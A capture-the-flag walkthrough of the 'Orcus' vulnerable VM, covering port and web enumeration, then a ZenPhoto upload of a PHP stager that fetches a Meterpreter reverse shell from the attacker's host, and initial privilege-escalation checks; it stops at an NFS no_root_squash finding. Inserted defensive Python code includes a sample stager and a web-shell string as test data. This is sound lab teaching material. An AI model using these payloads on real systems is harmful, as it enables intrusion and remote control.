
Hello guys, this is my third vulnerable VM by @ViperBlackSkull. If you need more information you can reach me on Twitter at @marghost. You can get the virtual machine HERE. So let's get started.
This VM is tagged as hard, and it is! First I ran nmap:
root@kali:~# nmap -T4 -A -v 192.168.1.21

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-03-22 13:33 EDT
Discovered open port 443/tcp on 192.168.1.21
Discovered open port 143/tcp on 192.168.1.21
Discovered open port 139/tcp on 192.168.1.21
Discovered open port 995/tcp on 192.168.1.21
Discovered open port 22/tcp on 192.168.1.21
Discovered open port 993/tcp on 192.168.1.21
Discovered open port 445/tcp on 192.168.1.21
Discovered open port 80/tcp on 192.168.1.21
Discovered open port 111/tcp on 192.168.1.21
Discovered open port 53/tcp on 192.168.1.21
Discovered open port 110/tcp on 192.168.1.21
Discovered open port 2049/tcp on 192.168.1.21

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
53/tcp   open  domain      ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 30 disallowed entries (15 shown)
| /exponent.js.php /exponent.js2.php /exponent.php
| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php
| /exponent_version.php /getswversion.php /login.php /overrides.php
| /popup.php /selector.php /site_rss.php /source_selector.php
|_/thumb.php
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      40370/tcp  mountd
|   100005  1,2,3      54899/udp  mountd
|   100021  1,3,4      32978/tcp  nlockmgr
|   100021  1,3,4      55763/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
443/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
MAC Address: 08:00:27:60:FE:29 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.048 days (since Wed Mar 22 12:24:55 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: ORCUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OK, so in summary: a web server; an RPC server with NFS, so maybe a mountable export; a Samba server; and the mail ports (110, 143, 993, 995) are open too. We also have two SSH servers, on 22 and 443, both presenting the same host-key fingerprints. That is odd.
Next step: run nikto against the web server and see what is going on.
root@kali:~# nikto -h 192.168.1.21
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.21
+ Target Hostname:    192.168.1.21
+ Target Port:        80
+ Start Time:         2017-03-22 16:44:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Entry '/exponent.js.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent.js2.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_bootstrap.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_constants.php' in robots.txt returned a non-forbidden or redirect HTTP code (500)
+ Entry '/exponent_php_setup.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_version.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/getswversion.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/login.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/overrides.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/site_rss.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/source_selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/thumb.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/ABOUT.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/CHANGELOG.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/CREDITS.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALLATION.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/README.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/RELEASE.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/TODO.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /files/: Directory indexing found.
+ Entry '/files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 30 entries which should be manually viewed.
+ Multiple index files found: /index.php, /index.html
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-2870: /index.php?download=/etc/passwd: Snif 1.2.4 allows any file to be retrieved from the web server.
+ OSVDB-59085: /index.php?|=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
+ OSVDB-59085: /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /files/: This might be interesting...
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3092: : This might be interesting... possibly a system shell found.
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /phpmyadmin/: phpMyAdmin directory found
+ 9338 requests: 0 error(s) and 48 item(s) reported on remote host
+ End Time:           2017-03-22 16:44:26 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
So we have some kind of portal and phpMyAdmin installed. Next I'll look at robots.txt and the README/CHANGELOG/LICENSE files the scan turned up.
robots.txt itself doesn't help. The README and LICENSE tell us this is an Exponent CMS install, and the CHANGELOG gives the version: 2.3.9.
A quick exploit search says that version is vulnerable to SQL injection, but when I go to index.php and try a few payloads nothing works; the portal also says the database is offline, so that is a dead end. (The index.php traversal hits in the nikto output are signature matches for other products, Snif, Portix and PHP-Nuke; any index.php that answers 200 to an unknown parameter triggers them, so they are noise here.)
The phpMyAdmin default login doesn't work either. I went through the other directories nikto revealed and found nothing interesting.
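As an added example (my code, not part of the original write-up and not nikto's), here is the check nikto ran above as a script: parse robots.txt, request each disallowed path without following redirects, and bucket the answers by status. A 302 on /login.php is a different finding from a 200 on /CHANGELOG.md, so redirects are reported as such instead of as the login page's 200. The target URL and the sample robots.txt are constructed; the real file on this box has 30 entries.

```python
"""Added example: probe every Disallow entry of a robots.txt the way nikto does.
Sample robots.txt and the default target are constructed for illustration."""
import re
import sys
import urllib.error
import urllib.request
from typing import Callable, Dict, List


def parse_robots(text: str) -> List[str]:
    """Return the unique Disallow paths in order of appearance.
    Comments are stripped; a bare 'Disallow: /' blocks everything and is not
    a path worth probing, so it is skipped."""
    paths: List[str] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"(?i)disallow\s*:\s*(\S*)", line)
        if m and m.group(1) not in ("", "/") and m.group(1) not in paths:
            paths.append(m.group(1))
    return paths


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface a 3xx as its own status instead of following it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # makes urllib raise HTTPError(code) for the 3xx


def http_status(url: str) -> int:
    """GET the URL and return the HTTP status, error statuses included."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def probe_robots(base_url: str, robots_text: str,
                 fetch: Callable[[str], int] = http_status) -> Dict[str, List[str]]:
    """Bucket each disallowed path by the server's answer. 'served' is what
    nikto calls 'non-forbidden'. `fetch` is injectable so the logic can be
    exercised without a live target."""
    buckets: Dict[str, List[str]] = {
        "served": [], "redirect": [], "forbidden": [], "missing": [], "error": []
    }
    for path in parse_robots(robots_text):
        code = fetch(base_url.rstrip("/") + "/" + path.lstrip("/"))
        if 200 <= code < 300:
            buckets["served"].append(path)
        elif 300 <= code < 400:
            buckets["redirect"].append(path)
        elif code in (401, 403):
            buckets["forbidden"].append(path)
        elif code == 404:
            buckets["missing"].append(path)
        else:
            buckets["error"].append(path)
    return buckets


# Constructed sample: a few of the entries the scan above found in robots.txt.
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /exponent.php
Disallow: /exponent_constants.php
Disallow: /login.php   # sends you to the login form
Disallow: /CHANGELOG.md
Disallow: /exponent.php
"""

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.1.21"
    robots_url = target.rstrip("/") + "/robots.txt"
    text = urllib.request.urlopen(robots_url, timeout=5).read().decode("utf-8", "replace")
    for bucket, paths in probe_robots(target, text).items():
        for p in paths:
            print(f"{bucket:9s} {p}")
```

Run it as `python3 probe_robots.py http://192.168.1.21`; the 'served' bucket is the list to read by hand, and the .md files in it are where the version leak above came from.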
The creator of the VM invites us to do extended enumeration, so I tried some other information-gathering tools. First enum4linux, to see what the SMB and RPC side gives away:
root@kali:~# enum4linux -a -o -n -v 192.168.1.21
Target ........... 192.168.1.21
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ====================================================
|    Enumerating Workgroup/Domain on 192.168.1.21    |
 ====================================================
[V] Attempting to get domain name with command: nmblookup -A '192.168.1.21'
[+] Got domain/workgroup name: WORKGROUP

 ============================================
|    Nbtstat Information for 192.168.1.21    |
 ============================================
Looking up status of 192.168.1.21
	ORCUS           <00> -         B <ACTIVE>  Workstation Service
	ORCUS           <03> -         B <ACTIVE>  Messenger Service
	ORCUS           <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 =====================================
|    Session Check on 192.168.1.21    |
 =====================================
[V] Attempting to make null session using command: smbclient -W 'WORKGROUP' //'192.168.1.21'/ipc$ -U''%'' -c 'help' 2>&1
[+] Server 192.168.1.21 allows sessions using username '', password ''

 ===========================================
|    Getting domain SID for 192.168.1.21    |
 ===========================================
[V] Attempting to get domain SID with command: rpcclient -W 'WORKGROUP' -U''%'' 192.168.1.21 -c 'lsaquery' 2>&1
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================
|    OS information on 192.168.1.21    |
 ======================================
[V] Attempting to get OS info with command: smbclient -W 'WORKGROUP' //'192.168.1.21'/ipc$ -U''%'' -c 'q' 2>&1
[+] Got OS info for 192.168.1.21 from smbclient:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
[V] Attempting to get OS info with command: rpcclient -W 'WORKGROUP' -U''%'' -c 'srvinfo' '192.168.1.21' 2>&1
[+] Got OS info for 192.168.1.21 from srvinfo:
	ORCUS          Wk Sv PrQ Unx NT SNT Orcus server (Samba, Ubuntu)
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03

 =============================
|    Users on 192.168.1.21    |
 =============================
[V] Attempting to get userlist with command: rpcclient -W 'WORKGROUP' -c querydispinfo -U''%'' '192.168.1.21' 2>&1
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: viper	Name: viper	Desc:
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: root	Name: root	Desc:
[V] Attempting to get userlist with command: rpcclient -W 'WORKGROUP' -c enumdomusers -U''%'' '192.168.1.21' 2>&1
user:[viper] rid:[0x3e8]
user:[root] rid:[0x3e9]

 =========================================
|    Share Enumeration on 192.168.1.21    |
 =========================================
[V] Attempting to get share list using authentication
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Orcus server (Samba, Ubuntu))

	Server               Comment
	---------            -------
	ORCUS                Orcus server (Samba, Ubuntu)

	Workgroup            Master
	---------            -------
	WORKGROUP            ORCUS

[+] Attempting to map shares on 192.168.1.21
[V] Attempting map to share //192.168.1.21/print$ with command: smbclient -W 'WORKGROUP' //'192.168.1.21'/'print$' -U''%'' -c dir 2>&1
//192.168.1.21/print$	Mapping: DENIED, Listing: N/A
[V] Attempting map to share //192.168.1.21/IPC$ with command: smbclient -W 'WORKGROUP' //'192.168.1.21'/'IPC$' -U''%'' -c dir 2>&1
//192.168.1.21/IPC$	Mapping: OK	Listing: DENIED

 ====================================================
|    Password Policy Information for 192.168.1.21    |
 ====================================================
[V] Attempting to get Password Policy info with command: polenum '':''@'192.168.1.21' 2>&1
[E] Unexpected error from polenum:
Traceback (most recent call last):
  File "/usr/bin/polenum", line 33, in <module>
    from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[V] Attempting to get Password Policy info with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c "getdompwinfo" 2>&1
[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5

 ==============================
|    Groups on 192.168.1.21    |
 ==============================
[V] Getting builtin groups with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'enumalsgroups builtin' 2>&1
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[V] Getting local groups with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'enumalsgroups domain' 2>&1
[+] Getting local groups:
[+] Getting local group memberships:
[V] Getting domain groups with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c "enumdomgroups" 2>&1
[+] Getting domain groups:
[+] Getting domain group memberships:

 =======================================================================
|    Users on 192.168.1.21 via RID cycling (RIDS: 500-550,1000-1050)    |
 =======================================================================
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames administrator' 2>&1
[V] Assuming that user "administrator" exists
[V] User "administrator" doesn't exist. User enumeration should be possible, but SID needed...
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames guest' 2>&1
[V] Assuming that user "guest" exists
[V] User "guest" doesn't exist. User enumeration should be possible, but SID needed...
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames krbtgt' 2>&1
[V] Assuming that user "krbtgt" exists
[V] User "krbtgt" doesn't exist. User enumeration should be possible, but SID needed...
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames domain admins' 2>&1
[V] Assuming that user "domain admins" exists
[V] User "domain admins" doesn't exist. User enumeration should be possible, but SID needed...
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames root' 2>&1
[V] Assuming that user "root" exists
[I] Found new SID: S-1-5-21-2160833340-863236869-394548843
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames bin' 2>&1
[V] Assuming that user "bin" exists
[I] Found new SID: S-1-22-1
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames none' 2>&1
[V] Assuming that user "none" exists
[V] Attempting to get SIDs from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c lsaenumsid 2>&1
[V] Processing SID S-1-5-32-550
[I] Found new SID: S-1-5-32
[V] Processing SID S-1-5-32-548
[V] Processing SID S-1-5-32-551
[V] Processing SID S-1-5-32-549
[V] Processing SID S-1-5-32-544
[V] Processing SID S-1-1-0
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1001 Unix User\kippo (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-2160833340-863236869-394548843 and logon username '', password ''
S-1-5-21-2160833340-863236869-394548843-501 ORCUS\nobody (Local User)
S-1-5-21-2160833340-863236869-394548843-513 ORCUS\None (Domain Group)
S-1-5-21-2160833340-863236869-394548843-1000 ORCUS\viper (Local User)
S-1-5-21-2160833340-863236869-394548843-1001 ORCUS\root (Local User)
So the box allows null sessions to SMB and RPC, and through them we find the users viper and root. We also found a user kippo while cycling RIDs under S-1-22-1: that is Samba's "Unix User" SID authority, where the RID is the Unix uid (1001 here), so it enumerates local accounts even when they have no Samba account. Sounds like a manga name; I'll maybe look into it.
Dirb with the big wordlist is my next step.
root@kali:~# dirb http://192.168.1.21 /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Mar 22 17:16:24 2017
URL_BASE: http://192.168.1.21/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.1.21/ ----
==> DIRECTORY: http://192.168.1.21/FCKeditor/
+ http://192.168.1.21/LICENSE (CODE:200|SIZE:15437)
==> DIRECTORY: http://192.168.1.21/admin/
==> DIRECTORY: http://192.168.1.21/backups/
==> DIRECTORY: http://192.168.1.21/cron/
==> DIRECTORY: http://192.168.1.21/external/
==> DIRECTORY: http://192.168.1.21/files/
==> DIRECTORY: http://192.168.1.21/framework/
==> DIRECTORY: http://192.168.1.21/install/
==> DIRECTORY: http://192.168.1.21/javascript/
==> DIRECTORY: http://192.168.1.21/phpmyadmin/
+ http://192.168.1.21/robots.txt (CODE:200|SIZE:1347)
+ http://192.168.1.21/server-status (CODE:403|SIZE:300)
+ http://192.168.1.21/sitemap.xml (CODE:200|SIZE:113)
==> DIRECTORY: http://192.168.1.21/themes/
==> DIRECTORY: http://192.168.1.21/tmp/
+ http://192.168.1.21/webalizer (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.21/zenphoto/

---- Entering directory: http://192.168.1.21/FCKeditor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.21/install/ ----
==> DIRECTORY: http://192.168.1.21/install/changes/
==> DIRECTORY: http://192.168.1.21/install/files/
==> DIRECTORY: http://192.168.1.21/install/images/
==> DIRECTORY: http://192.168.1.21/install/include/
==> DIRECTORY: http://192.168.1.21/install/pages/
==> DIRECTORY: http://192.168.1.21/install/popups/
==> DIRECTORY: http://192.168.1.21/install/samples/
==> DIRECTORY: http://192.168.1.21/install/upgrades/

---- Entering directory: http://192.168.1.21/javascript/ ----
==> DIRECTORY: http://192.168.1.21/javascript/jquery/

---- Entering directory: http://192.168.1.21/phpmyadmin/ ----

---- Entering directory: http://192.168.1.21/zenphoto/ ----
+ http://192.168.1.21/zenphoto/LICENSE (CODE:200|SIZE:18205)
==> DIRECTORY: http://192.168.1.21/zenphoto/albums/
==> DIRECTORY: http://192.168.1.21/zenphoto/cache/
==> DIRECTORY: http://192.168.1.21/zenphoto/cache_html/
==> DIRECTORY: http://192.168.1.21/zenphoto/plugins/
+ http://192.168.1.21/zenphoto/robots.txt (CODE:200|SIZE:471)
==> DIRECTORY: http://192.168.1.21/zenphoto/themes/
==> DIRECTORY: http://192.168.1.21/zenphoto/uploaded/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-data/

---- Entering directory: http://192.168.1.21/zenphoto/zp-core/ ----
+ http://192.168.1.21/zenphoto/zp-core/dataaccess (CODE:200|SIZE:187)
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/exif/
+ http://192.168.1.21/zenphoto/zp-core/htaccess (CODE:200|SIZE:546)
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/images/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/js/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/locale/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/setup/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/utilities/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/watermarks/

-----------------
DOWNLOADED: 1575266 - FOUND: 13
I cleaned the output up a little, and some interesting things turned up. /zenphoto/ is a gallery application that lets users upload images, which is interesting for a web_delivery attack. There is also a /backups/ directory that nikto didn't find the first time, with interesting things in it: SSH credentials that I can't download for now, and a zipped file. Let's download that. Inside is a db_conn.php file containing:
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');
Next I tried to get into ZenPhoto. I ran its setup and everything worked fine, so I could upload a PHP web_delivery stager and reach it through the /zenphoto/albums/ directory.
This is how I set up the web_delivery handler in Metasploit:
use exploit/multi/script/web_delivery
set target 1
set lhost 192.168.1.14
set payload php/meterpreter/reverse_tcp
set uripath v9HL33yWdUR4KFo
run
Then I created a webdelivery.php file containing just the stager (the URL has to match the one web_delivery prints when it starts):
<?php eval(file_get_contents('http://192.168.1.14:8080/9HL33yWdUR4KFo')); ?>
I zipped it and uploaded it through ZenPhoto. It worked like a charm: when I browsed /zenphoto/albums/ my webdelivery.php was there. Just open it in the browser and Metasploit opens a session. Interact with it, type the shell command, and spawn a proper bash with python:
sessions -i 1
python -c 'import pty; pty.spawn("/bin/bash")'
Now I have terminal access 😀
And BAM, the first flag!
[*] Meterpreter session 1 opened (192.168.1.14:4444 -> 192.168.1.21:58000) at 2017-03-22 23:56:38 -0400

sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 5753 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Orcus:/var/www/html/zenphoto/albums/webdelivery-1$ cd /var/www
www-data@Orcus:/var/www$ ls
9bd556e5c961356857d6d527a7973560-zen-cart-v1.5.4-12302014.zip
a0c4f0d176f87ceda9b9890af09ed644-Adem-master.zip
b873fef091715964d207daa19d320a99-zenphoto-zenphoto-1.4.10.tar.gz
flag.txt
html
zenphoto-zenphoto-1.4.10
www-data@Orcus:/var/www$ cat flag.txt
868c889965b7ada547fae81f922e45c4
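The upload above succeeded because the gallery accepted a zip whose members it never inspected, so a .php file landed in a web-served directory. As an added example (my code, not ZenPhoto's; the accepted types and rejection rules are my assumptions), this is the audit an image-upload handler should run on an archive before unpacking it: reject anything that is not a real image by both name and magic bytes, catch double extensions like cover.jpg.php that Apache's multi-extension handling would still execute, and catch zip-slip paths and symlinks that escape the album directory. The sample archives are constructed in the code.

```python
"""Added example: audit an uploaded album archive before extracting it.
Rules and samples are my assumptions, not the gallery's real code."""
import io
import posixpath
import stat
import zipfile
from typing import Dict, List

IMAGE_MAGIC = {  # leading bytes -> extensions that may carry them
    b"\xff\xd8\xff": {".jpg", ".jpeg"},
    b"\x89PNG\r\n\x1a\n": {".png"},
    b"GIF87a": {".gif"},
    b"GIF89a": {".gif"},
}
SCRIPT_EXT = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps"}
MAX_MEMBER_BYTES = 20 * 1024 * 1024  # per-image cap, a crude zip-bomb guard


def build_album(files: Dict[str, bytes]) -> bytes:
    """Pack name -> content into an in-memory zip (used for the samples)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


def audit_album(data: bytes) -> List[str]:
    """Return the reasons the archive must be rejected. An empty list means
    every member is a plain image that stays inside the album directory."""
    problems: List[str] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            norm = posixpath.normpath(name)
            # zip-slip: '../../shell.php' or '/var/www/x.php' lands outside albums/
            if name.startswith("/") or "\\" in name or norm.split("/")[0] == "..":
                problems.append(f"{name}: path escapes the album directory")
                continue
            if info.is_dir():
                continue
            # unix mode lives in the high 16 bits; a symlink could point at the webroot
            if stat.S_ISLNK(info.external_attr >> 16):
                problems.append(f"{name}: symlink")
                continue
            base = posixpath.basename(norm)
            if base.startswith(".ht"):
                problems.append(f"{name}: Apache config override")
                continue
            # every extension, so 'shell.php.jpg' and 'x.jpg.php' are both caught
            exts = ["." + part.lower() for part in base.split(".")[1:]]
            if any(e in SCRIPT_EXT for e in exts):
                problems.append(f"{name}: server-side script extension")
                continue
            if info.file_size > MAX_MEMBER_BYTES:
                problems.append(f"{name}: {info.file_size} bytes exceeds the per-image limit")
                continue
            with zf.open(info) as fh:
                head = fh.read(8)
            allowed = next((x for magic, x in IMAGE_MAGIC.items() if head.startswith(magic)), None)
            if allowed is None or not exts or exts[-1] not in allowed:
                problems.append(f"{name}: content is not the image type its name claims")
    return problems


# Constructed samples: a clean album, and the kind of upload used above.
CLEAN_ALBUM = build_album({"holiday/beach.png": b"\x89PNG\r\n\x1a\n" + b"\0" * 16})
STAGER_ALBUM = build_album({
    "webdelivery/webdelivery.php": b"<?php eval(file_get_contents('http://attacker/x')); ?>",
    "webdelivery/cover.jpg.php": b"\xff\xd8\xff\xe0 fake jpeg header",
    "../../shell.php": b"<?php system($_GET['c']); ?>",
})

if __name__ == "__main__":
    for label, album in (("clean", CLEAN_ALBUM), ("stager", STAGER_ALBUM)):
        print(label, "->", audit_album(album) or "accepted")
```

Checking the bytes as well as the name matters: a file called x.png that starts with `<?php` is rejected too, which is the other half of what lets a "gallery" turn into a PHP dropper.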
Next I ran linuxprivchecker to look for an escalation path:
wget http://www.securitysift.com/download/linuxprivchecker.py
chmod +x linuxprivchecker.py
python ./linuxprivchecker.py
It reported the MySQL server as vulnerable, BUT secure_file_priv is set, so there is no chance of exploiting raptor_udf2 with dbuser: that setting restricts where SELECT ... INTO DUMPFILE can write, so the UDF shared object cannot be dropped into the plugin directory.
git clone https://github.com/PenturaLabs/Linux_Exploit_Suggester.git
Nothing to be found there either.
git clone https://github.com/rebootuser/LinEnum.git
cd LinEnum
./LinEnum.sh
The first thing I saw was /home/.youwillfindnothinghere, and I thought MEH, maybe... but no:
www-data@Orcus:/$ cd /home/.youwillfindnothinghere
www-data@Orcus:/home/.youwillfindnothinghere$ ls
itoldyou
www-data@Orcus:/home/.youwillfindnothinghere$ cat itoldyou
PFFFF
But LinEnum found something useful:
NFS config details:
-rw-r--r-- 1 root root 415 Oct 18 19:56 /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#		to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,no_root_squash)
